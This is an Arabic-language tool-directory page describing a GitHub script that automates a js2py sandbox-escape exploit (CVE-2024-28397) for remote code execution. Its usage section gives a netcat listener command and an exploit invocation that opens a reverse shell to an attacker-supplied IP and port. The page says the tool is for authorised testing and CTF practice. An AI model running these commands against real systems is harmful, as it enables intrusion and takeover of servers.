Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-28397-Exploit-Automation — نص برمجي لأتمتة Python لاستغلال ثغرة **js2py Sandbox Escape** (CVE-2024-28397). تعمل هذه الأداة على أتمتة عملية توليد الحمولة وتسليمها لتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) على الأنظمة المعرضة للخطر. | Kitploit
أدوات/GitHubGitHub/l1337xi/cve-2024-28397-exploit-automation
توليد الحمولةالاستغلالاستغلال تطبيقات الويبCTFالتعلم والتعليمأداة الوصول عن بعد
GitHubl1337xi/cve-2024-28397-exploit-automation

CVE-2024-28397-Exploit-Automation

نص برمجي لأتمتة Python لاستغلال ثغرة **js2py Sandbox Escape** (CVE-2024-28397). تعمل هذه الأداة على أتمتة عملية توليد الحمولة وتسليمها لتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) على الأنظمة المعرضة للخطر.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
25منذ 9 أشهرلم تتم المراجعة بعد
مشاركة

أتمتة استغلال CVE-2024-28397

نص برمجي بأتمتة بايثون لاستغلال ثغرة js2py Sandbox Escape (CVE-2024-28397). تقوم هذه الأداة بأتمتة عملية توليد الحمولة وتسليمها لتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) على الأنظمة القابلة للاستغلال.

⚠️ إخلاء المسؤولية القانونية استخدام هذه الأداة لمهاجمة الأهداف دون موافقة مسبقة من الطرفين يُعد غير قانوني. هذا المستودع لأغراض تعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام لهذه المعلومات. صُممت هذه الأداة لتُستخدم في اختبارات الاختراق المصرح بها وبيئات مسابقات Capture The Flag (CTF).

🧐 حول الثغرة

تؤثر CVE-2024-28397 على مكتبة js2py (الإصدارات < 0.74). تفشل المكتبة في عزل بيئة الجافاسكربت بشكل صحيح عن بيئة بايثون المضيفة.

  • الخلل: عدم تعقيم المدخلات بشكل صحيح يسمح بالوصول إلى الخصائص الداخلية __class__ و __subclasses__ في بايثون.
  • الأثر: يمكن للمهاجم اجتياز التسلسل الهرمي للكائنات للوصول إلى subprocess.Popen، مما يتيح تنفيذ أوامر عشوائية على الخادم المضيف.

🚀 الميزات

  • توليد الحمولة تلقائيًا: يبني منطق الهروب من بيئة الجافاسكربت المعزولة تلقائيًا.
  • ترميز Base64: يتولى ترميز الحمولة لمنع أخطاء الصياغة أثناء الإرسال.
  • معالجة الاتصال: يكتشف نجاح تنفيذ الصدفة بناءً على انتهاء مهلة الطلبات.
  • مخرجات احترافية: واجهة CLI نظيفة مع تحديثات الحالة.

🛠️ الاستخدام

المتطلبات الأساسية

pip install requests

ابدأ مستمع Netcat :

nc -lvnp 1337

شغّل السكربت :

python3 exploit.py -u <target url> -i <attacker ip> -p <attacker port>

📸 إثبات المفهوم

إليك الأداة أثناء عملها ضد هدف قابل للاستغلال (Hack The Box - CodeTwo):

1. التنفيذ

تشغيل الاستغلال لتوليد الحمولة وتحفيز الاستدعاء الراجع: crop3

2. النجاح

استلام الصدفة العكسية على المستمع: نجاح الصدفة العكسية

  • 📜 الاعتمادات

  • اكتشاف الثغرة وحمولة الجافاسكربت الأساسية: Marven11

  • نص الأتمتة: L1337Xi

  • المساهمون:

    • Leyn4L
    • iamrizwanvp
    • axai457
تنزيل الأداة